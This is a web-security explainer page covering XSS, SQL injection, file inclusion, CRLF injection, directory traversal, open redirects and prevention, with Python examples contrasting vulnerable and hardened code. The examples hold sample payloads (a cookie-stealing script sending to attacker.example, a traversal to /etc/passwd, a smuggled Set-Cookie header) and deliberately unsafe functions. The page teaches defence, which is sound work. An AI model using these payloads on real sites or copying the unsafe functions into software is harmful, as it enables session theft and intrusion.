The Safety Policy and Browser Security Statement.
Web Site and Web Application Security.
Internet communication and Web sites have too often become security
and privacy risks for their visitors. This section lists some of the
technical exposures that put Web visitors at risk.
Cross-Site Scripting (XSS).
Cross-site scripting (XSS) is a class of Web application vulnerability
in which a site copies untrusted input (a query parameter, a stored
comment, a profile field) into a page without encoding it, so that script
supplied by one user runs in the browsers of other users, with the
site's origin and the site's cookies. Often during an attack
“everything looks fine” to the end user, who may nonetheless suffer
session hijacking, theft of sensitive data and financial loss.
The flaw lives in the Web application, not in the browser: the browser
is doing exactly what the page tells it to do. The malicious input can
reach the vulnerable page through a crafted link in an e-Mail, through
a page on the user's own computer that submits it, or through content
already stored on the remote Web server. The payload is usually
JavaScript, though any content the browser will execute (an HTML event
handler, for example) serves the same purpose.
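As an added example, not code from the original page, the following Python shows why the fix for XSS is output encoding chosen for the context the input lands in. The sample query string is constructed for the demonstration; the escaping uses only the standard library's html and json modules.

```python
import html
import json

# Constructed sample: a reflected "search" parameter carrying a cookie-stealing script.
UNTRUSTED_QUERY = (
    '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
)


def render_unsafe(query: str) -> str:
    """Vulnerable: user input is concatenated straight into the HTML body."""
    return "<p>Results for: " + query + "</p>"


def render_escaped(query: str) -> str:
    """Hardened for the HTML text context: encode &, <, >, " and ' first."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def render_attribute_escaped(query: str) -> str:
    """Attribute context: the attribute must be quoted AND quotes inside escaped,
    otherwise a value such as  " onfocus="alert(1)  adds a new attribute."""
    return '<input type="text" value="' + html.escape(query, quote=True) + '">'


def render_js_escaped(query: str) -> str:
    """JavaScript-string context: html.escape is the wrong tool here (the browser
    does not HTML-decode inside <script>). Emit a JSON string literal and break
    up "</" so the HTML parser cannot see a premature </script>."""
    literal = json.dumps(query).replace("</", "<\\/")
    return "<script>var q = " + literal + ";</script>"


def contains_script_tag(markup: str) -> bool:
    """Crude check used to compare the vulnerable and hardened renderings."""
    return "<script" in markup.lower()
```

The attribute and script-block renderers matter because a site that escapes only for the HTML body is still exploitable wherever it echoes input inside an attribute or a script; each context has its own encoding rules.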
SQL (Structured Query Language) Injection.
SQL injection is a technique that exploits a security vulnerability in
the way an application builds its database queries. The vulnerability is
present when user input is spliced into the text of an SQL statement, so
that quote characters or other SQL syntax in the input change the meaning
of the statement; typically the input is neither correctly escaped nor
passed as a typed parameter. It is in fact an instance of a more general
class of vulnerabilities that can occur whenever one programming or
scripting language is embedded inside another.
SQL injection attacks can compromise the integrity and security of an
online database, e.g. databases used for storing customer information.
Nothing needs to run on the user's computer to exploit the vulnerability;
the attack is carried entirely in the request sent to the server.
In January 2008 an automated SQL injection attack compromised tens of
thousands of Web pages. It did not exploit a flaw in Microsoft SQL Server
itself; it exploited injection flaws in Web applications that used SQL
Server, writing a script tag into every text column it could reach. The
compromised sites were then used as the exploit vehicle against their
visitors. Later in 2008 an estimated 500,000 Web sites, including well
respected brand name Web sites, were infected in the same way with
injected script that could take over a visitor's personal computer
simply through the visitor viewing an infected page. Such exploits occur
without any visible sign that the visitor's computer has been attacked.
A multiple-strike attack kit is loaded from the attacker's server; the
kit tries eight different exploits against the browser and its plug-ins,
and if it finds one that works, it hijacks the user's computer. The
injected payload is a script tag, so some form of JavaScript is the
delivery mechanism, but the actual compromise relies on unpatched flaws
in the browser or its plug-ins.
File Inclusion.
Remote file inclusion (RFI) attacks allow malicious users to run their
own server-side code on a vulnerable Web site. They occur when the
application passes a user-controlled value, such as a page name taken
from a URL parameter, to an include or require statement, so the attacker
can point it at a file hosted on a server the attacker controls. Local
file inclusion (LFI) is the same flaw applied to files already on the
server. These attacks are most common on PHP sites, where include() will
fetch a URL if allow_url_include is enabled, but any platform that builds
an include path, template name or file name from user input is exposed.
Code Execution.
An arbitrary code execution attack enables an intruder to run code of
their choosing on the target machine from inside a Web page or Web
application. On the client side this usually means a memory-safety flaw
in the browser, a plug-in or a document reader, reached through a crafted
page; JavaScript is often only the vehicle that delivers the exploit. On
the server side it usually means user input reaching an interpreter or a
shell, for example through eval(), a template engine or a system() call
built from request parameters.
LDAP (Lightweight Directory Access Protocol) Injection.
Simply stated, LDAP, Lightweight Directory Access Protocol, is an
Internet protocol that e-Mail clients and other programs use to look up
information in a directory server. LDAP injection is an attack used to
exploit Web applications that build LDAP search filters from user input
without escaping the filter metacharacters: the parentheses, the asterisk
and the backslash. Such attacks can expose or alter the directory data
the affected application is authorised to reach, and when the filter is
used for login they can bypass authentication.
Cross Frame Scripting.
With Dynamic HTML (DHTML), content in different windows and frames
can interact in powerful ways by scripting with the object model. However,
since a browser can simultaneously display unrelated documents in its
various windows and frames, certain rules must be enforced to protect
data integrity and the privacy of information; the browser's same-origin
policy is the main such rule.
Cross frame scripting exploits involve Web pages that use frames,
wherein a legitimate site is displayed in one frame while a frame
controlled by the attacker sits beside or on top of it and its script
tries to observe what the user does in the legitimate frame, such as
keystrokes and form contents. The malicious frame is generally presented
as the part of the page that requests personal user information and
sensitive data.
A hidden frame can also be used to deliver malicious code to the
user's computer without the user's knowledge. The malicious code is
fetched automatically merely by the user opening such a Web page within
their Web browser. Such a frame can be designed to any dimension, can be
as small as 1 pixel by 1 pixel, and can be attached to what appears to be
a legitimate hyperlink. A site can refuse to be placed in another site's
frame at all by sending the X-Frame-Options response header, which
removes the first class of attack against its own pages.
CRLF (Carriage Return Line Feed) Injection.
CRLF [Carriage Return Line Feed] injection attacks occur when an
application copies user input into a context where a carriage return and
line feed mark the end of a line, such as an HTTP response header, a log
entry or the header block of an e-Mail message, without rejecting or
encoding those two characters. In an HTTP response the injected line
break lets the attacker add headers, or even an entire second response,
that can redirect the visitor, set cookies or plant content, and the same
trick is used to divert and obfuscate an attack in server logs. CRLF
attacks are also used to compromise e-Mail submission forms and
anonymous e-Mail services by adding recipients or headers to the message.
Directory Traversal.
A directory traversal (or path traversal) attack exploits insufficient
validation or sanitization of user-supplied file names, so that sequences
meaning "traverse to parent directory" (../ and its URL-encoded forms)
are passed through to the file APIs.
The goal of this attack is to make an application access a file that
was never intended to be accessible. The attack exploits a lack of
security checks (the software is acting exactly as it is supposed to)
as opposed to exploiting a bug in the code.
Directory traversal is trickier to prevent than it might seem. A
“filter out known bad characters” protection strategy is
likely to fail: stripping ../ once turns ....// into ../, and encoded
or null-byte variants slip past a naive filter.
Many other factors, such as the server process's permissions and where
the target file lives, determine whether a particular traversal actually
works. However, if the application does not verify that the resolved
path lies within the directory it intends to serve, attackers usually
have some wiggle room to exploit this functionality for malicious
purposes.
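As an added example serving both the File Inclusion and the Directory Traversal sections above, not code from the original page, the following Python resolves a user-supplied template name the way an include() or file-serving handler would. The base directory /srv/app/templates is an assumption for the demonstration and need not exist; the check is the same one a PHP include path or any file name built from input requires. A POSIX file system is assumed.

```python
import os
import urllib.parse

# Assumed document root for includes; any directory would do.
BASE_DIR = os.path.realpath("/srv/app/templates")

# Constructed payload: stripping "../" once turns each "....//" into "../".
DOUBLED_PAYLOAD = "....//....//....//etc/passwd"


def strip_dotdot(name: str) -> str:
    """The 'filter out known bad characters' strategy: remove '../' once."""
    return name.replace("../", "")


def resolve_unsafe(name: str) -> str:
    """Vulnerable: after the naive filter the name still escapes BASE_DIR."""
    return os.path.join(BASE_DIR, strip_dotdot(name))


def resolve_safe(name: str):
    """Hardened: decode, resolve to a canonical absolute path (following
    symlinks), then require that the result is still inside BASE_DIR.
    Returns None for anything that is not; nothing is stripped or rewritten."""
    decoded = urllib.parse.unquote(name)
    if "\x00" in decoded:
        return None  # null byte: would truncate the name in C-based file APIs
    # os.path.join discards BASE_DIR if `decoded` is absolute, and realpath
    # collapses every "..", so the containment test below catches both cases.
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        return None
    return candidate
```

Note what happens to the doubled payload under each strategy: the naive filter produces ../../../etc/passwd and the vulnerable resolver lands on /etc/passwd, whereas the hardened resolver never strips anything, treats "...." as an ordinary (nonexistent) directory name, and keeps the result inside BASE_DIR. A remote URL passed as the name (http://attacker.example/shell.txt) is likewise resolved as a local relative path under BASE_DIR rather than fetched.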
XPath (XML Path Language) Injection.
XPath Injection is an attack technique used to exploit web sites that
construct XPath queries from user-supplied input.
XPath 1.0 is a language used to refer to parts of an XML document.
It can be used directly by an application to query an XML document, or
as part of a larger operation such as applying an XSLT transformation to
an XML document, or applying an XQuery to an XML document.
An attacker can inject XPath expressions into such a query. When the
query is used for authentication, the result can be the attacker being
logged in as the first user listed in the XML document, although the
attacker did not provide any valid user name or password. XPath has no
access control of its own, so a successful injection can usually read the
whole document.
URL (Uniform Resource Locator) Redirection.
URL/URI (Uniform Resource Identifier) redirection is a technique used
to send the Web browser on to a different URL address. URI redirection
can be used within the code behind a framework to simplify Web page
addresses. However, when the destination is taken from a request
parameter without validation (an open redirect), the same mechanism can
send the Web visitor from a trusted address to a malicious Web site or
content page, which is why phishing e-Mails favour such links.
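As an added example serving both the CRLF Injection and the URL Redirection sections, not code from the original page, the following Python validates a redirect target before it is written into a Location header. It rejects the line-break characters that would let the input add headers and it refuses destinations outside the site, including the forms that commonly slip past a prefix check. The trusted host name and the sample targets are assumptions for the demonstration.

```python
import urllib.parse

# Assumed: the application's own host names.
TRUSTED_HOSTS = {"www.example.com"}

# Constructed payload: a CRLF inside the parameter smuggles in a Set-Cookie header.
CRLF_PAYLOAD = "/account\r\nSet-Cookie: session=attacker"


class BadRedirect(ValueError):
    """Raised for any redirect target the application should refuse."""


def location_header_unsafe(target: str) -> str:
    """Vulnerable: the raw parameter becomes the header line, CR/LF included."""
    return "Location: " + target + "\r\n"


def safe_redirect_target(target: str) -> str:
    """Hardened: reject header injection, then allow only a site-relative path
    or an absolute http(s) URL whose host is one of ours."""
    if "\r" in target or "\n" in target:
        raise BadRedirect("control characters in redirect target")
    # "//host" and "/\host" are scheme-relative URLs to browsers, not local paths.
    if target.startswith("/") and not target.startswith(("//", "/\\")):
        return target
    parsed = urllib.parse.urlsplit(target)
    if parsed.scheme not in ("http", "https") or parsed.hostname is None:
        raise BadRedirect("unsupported scheme or missing host")
    # .hostname is the part after any user@ prefix, so
    # https://www.example.com@evil.example/ is judged by "evil.example".
    if parsed.hostname not in TRUSTED_HOSTS:
        raise BadRedirect("host not trusted: " + parsed.hostname)
    return target


def location_header_safe(target: str) -> str:
    """Builds the header only from a target that passed validation."""
    return "Location: " + safe_redirect_target(target) + "\r\n"


def is_rejected(target: str) -> bool:
    """True when safe_redirect_target refuses the target."""
    try:
        safe_redirect_target(target)
    except BadRedirect:
        return True
    return False
```

The host comparison is exact rather than a startswith() test because www.example.com.evil.example would otherwise pass; and the check for CR and LF runs before any parsing, since the characters matter the moment they reach the response, not after URL normalisation.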
Prevention.
Prevention of and protection against malicious Web attacks is
multi-faceted. Overall protection depends upon the Web content
developer, the Web server and the client computer.
The Web Developer.
It is the Web developer's responsibility to serve as the first line
of defense against malicious Web attacks against the site's visitors.
Vulnerabilities can be created by improper use and structure of the
code and script created by the developer. This, also, includes improper
configuration of the site's framework and any databases used.
The Web Server.
The Web server is the computer, or the hosting company, on which the
Web content is hosted and from which it is served to the visitor's
computer.
The Web server must be properly configured and the latest security
updates installed. No Web developer should assume that a hosting company,
or even the developer's own internal IT specialists, has done so. The Web
developer must take responsibility for verifying that such security
updates and proper configuration of the server are in place.
The Client Computer.
The client computer is the computer used by the Web visitor, whether
that computer is a workstation, a standalone desktop or laptop, or any
other device used to access the Internet.
The Operating System.
The operating system of both server and client must be kept updated
with the latest security and software patches and updates.
The Web Browser.
The manufacturer of the modern Web browser has assumed responsibility
to provide a framework that attempts to minimize exposure to security
threats. Browsers must be kept updated on all systems with the browser's
latest software and updates.
Anti-virus, Spyware and Firewall Applications.
These security applications must be installed, configured
properly and updated regularly. They should be configured to check for
updated definition files on a daily basis. System scans of the critical
system files should be scheduled and conducted daily, and full scans of
all hard drives weekly. Additionally, they need to be configured to
scan the e-Mail client's incoming and outgoing messages.
Miscellaneous Applications and Frameworks.
Miscellaneous software applications that are used to connect to the
Internet or to interact with any Web site or Web application need to be
kept updated. These types of application include media players, Flash
players and document readers.
The Content Owner.
Legal responsibility and subsequent liability exposure resides with
the owner of the Web site and Web application. Ownership can be diverse
particularly if the copyright owner is different from that, for example,
of the firm or individuals who profit from the Web site.
If you have any questions regarding the Boinkin Safety Policy, please
e-Mail that boinkin guy.
JavaScript and Web Applications.
JavaScript is a scripting language that is widely used for
client-side execution on Web sites and Web applications.
Client-side scripts are those scripts embedded into a Web page that
will run on the Web visitor's (Client) computer (Side).
A great many malicious Web attacks and vulnerabilities depend upon
JavaScript, either as the payload itself or as the loader that fetches
the exploit.
JavaScript is both overused and poorly implemented within many Web
sites and applications. This dramatically increases the exposure of the
content and its usefulness for mounting attacks.
The first line of defense in mitigating potential of most Web site
and Web application attacks falls onto the Web developer of the content
and application.
Two basic rules apply. First, keep it simple, stupid: unless there
is a functional need for it, don't do it. Secondly, know what the hell
you are doing.
Database Construction, Configuration and Deployment.
Databases holding sensitive information within Web sites and
applications have become increasingly exposed to attack. Such exposure
extends to any deployed server database, whether it is reachable through
a Web application or not.
Database security in development, deployment and access is too often
overlooked by the inexperienced Web developer. Both servers and databases
need rigorous testing to ensure integrity and security. In turn, both
need to be continually monitored for any potential breaches in security.
Security Compliance.
Security compliance for Web sites and Web applications is a legal
necessity. Outside of the more specialized compliance requirements of the
Health Insurance Portability and Accountability Act [HIPAA] or the
Sarbanes-Oxley Act [SOX], two legal requirements apply to a great
many Web sites: the Children's Online Privacy Protection Act [COPPA] and
the Payment Card Industry Data Security Standard [PCI DSS].
Beyond security, the Americans with Disabilities Act [ADA] can impact
Web sites and bears a legal responsibility of compliance.
Such requirements and solutions are not built into browsers nor are
they part of any Web development application.
Responsibility and implementation of the legal requirements rests
with the owner of the content.
Additionally, requirements on social networking content and adult Web
sites, not all of them yet published as formal regulation, are becoming
increasingly necessary to meet.
Systems Risk Assessment.
Ninety-eight Percent of Home Computers May Be at Risk.
Security researchers at the Danish firm Secunia reported that fewer
than two per cent of the home PCs that had Secunia's PSI (Personal
Software Inspector) program installed were running fully patched software.
The company warned that out-of-date software is often vulnerable to
recently discovered flaws in its code, which can let cybercriminals
infect or attack a PC.
Computers that lack security updates for their applications and their
operating system are vulnerable to exploits and malicious attacks.